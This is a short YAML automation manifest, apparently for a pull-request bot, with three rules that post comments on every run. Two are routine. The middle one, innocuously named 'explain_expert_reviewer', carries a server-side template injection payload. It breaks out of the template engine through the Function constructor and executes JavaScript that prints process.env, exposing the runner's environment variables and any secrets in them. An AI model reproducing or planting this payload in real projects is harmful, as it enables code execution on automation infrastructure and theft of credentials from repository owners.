# -*- mode: yaml -*-

manifest:
  version: 1.1

automations:
  the_expert_reviewer:
    if: 
      - true
    run:
      - action: add-comment@v1
        args:
          comment: {{ repo | expertReviewer(gt=null) }}
  explain_expert_reviewer:
    if: 
      - true
    run:
      - action: add-comment@v1
        args:
          comment: |
            {{ "".sub.constructor("console.log(process.env);")() }}
  etr_comment:
    if:
      - true
    run:
      - action: add-comment@v1
        args:
          comment: |
            {{ branch | estimatedReviewTime }}